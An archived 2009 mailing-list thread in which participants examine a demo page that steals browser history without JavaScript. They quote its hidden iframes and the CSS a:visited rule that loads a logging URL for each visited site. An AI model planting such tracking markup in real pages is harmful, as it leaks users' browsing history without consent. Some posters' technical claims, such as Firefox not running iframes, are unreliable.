Stealing browser history without JavaScript

Mon Jun 15 20:40:11 UTC 2009

Zinco wrote:
>>>>> Matej Kovacic wrote:
>>>>>   
>>>>> Hi,
>>>>>
>>>>> this seems an interesting issue:
>>>>>
>>>>> http://www.making-the-web.com/misc/sites-you-visit/nojs/
>>>>>
>>>>> bye, Matej
>>>>>           
>
>   
>>>> Anon Mus Wrote:     
>>>> Been to this site and it dont work on my firefox.3.0.8 browser... (with 
>>>> NoScript, QuickJava, Better Privacy, JavaScript Deobfuscator, Quick 
>>>> Preference Button & User Agent Switcher)
>>>>
>>>> it replies with a 0 (zero) count. But there should be dozens.
>>>>         
>
>   
>>> Zinco Wrote:
>>> Seems to me it would have to have all websites known to man on the page
>>>       
> it
>   
>>> loads.  If it looks at "visited links" css on the page it loads it could
>>> only look at websites on that page.  It would have to store a lot of web
>>> pages on that hidden i-frame to really compare.  Unless you are looking
>>>       
> to
>   
>>> see if a particular person visited a particular page doesn't seem like it
>>> would do anyone much good.
>>>
>>>       
>
>   
>> Anon Mus Wrote:   
>> Maybe IFrames don't work on Firefox. The pages IFrame message "Please 
>> enable Iframes, though" is superfluous, as it only prints if IFrames is 
>> functional !!
>>     
>
>   
>> Reminds me of a security software con site years ago which would print 
>> some detail value known only to your browser, up on a web page. Of 
>> course, only YOU could see it, no data was sent to the visited web site.
>>     
>
>   
>> Even though it was a con,  lots of people bought the security software 
>> to protect themselves from that non-existent leak.
>>     
>
>   
>> In this IFrames exploit the test web page is said to have a css 
>> background image embedded in it. I can find no such image (background: 
>> #003399;).
>> (See http://www.w3schools.com/css/pr_background.asp.)
>>     
>
>   
>> The only image on the page is a javascript button. But there is a 
>> javascript dependent Google Analytics urchin tracker.
>>     
>
>
>   
>> Would the author Brendon Bo[mb]shell like to identify him/her self?
>>     
>
> Zinco Wrote:
>
> 50000 pages isn't very much.  Would have to contain millions it would seem.
> It did work on my browser and found 30 of the most popular sites.  Ebay ect.
>
> *************************
> Index.php I-Frame
> <iframe src="start_scan.php?769245844" width="300" height="260"
> frameborder="0" scrolling="no">Please enable Iframes, though</iframe>
>
> <p><!-- AddThis Button BEGIN -->
> <!-- AddThis Button END -->
> <script type="text/javascript">
> digg_skin = 'compact';
> digg_window = 'new';
> </script>
> <script src="http://digg.com/tools/diggthis.js"
> type="text/javascript"></script> 
> <script type="text/javascript"
> src="http://www.reddit.com/button.js?t=1"></script>
> </p>
> *******************************
> Start_scan.php I-frame
> <iframe src="sites_list.php?sess=fe728e" width="288" height="210"
> frameborder="0"></iframe>
>
> </div>
>
> <iframe src="base.php?sess=fe728e" width="1" height="1"
> frameborder="0"></iframe>
> **********************************
> Base.php
> <style type="text/css">#l2001
> a:visited{background:url(log_base.php?id=2001&sess=fe728e);}
> ***************************
>
>
>
>   
So there is the IFrame provisioned background image.

As I couldn't see this "base.php" code, then it pretty much confirms 
that firefox don't run IFrames.

Obviously the,

"

<p><!-- AddThis Button BEGIN -->
<!-- AddThis Button END -->
<script type="text/javascript">
digg_skin = 'compact';
digg_window = 'new';
</script>
<script src="http://digg.com/tools/diggthis.js"
type="text/javascript"></script> 
<script type="text/javascript"
src="http://www.reddit.com/button.js?t=1"></script>
</p>

"
section will only run as javascript.. so "NoScript" takes care of that.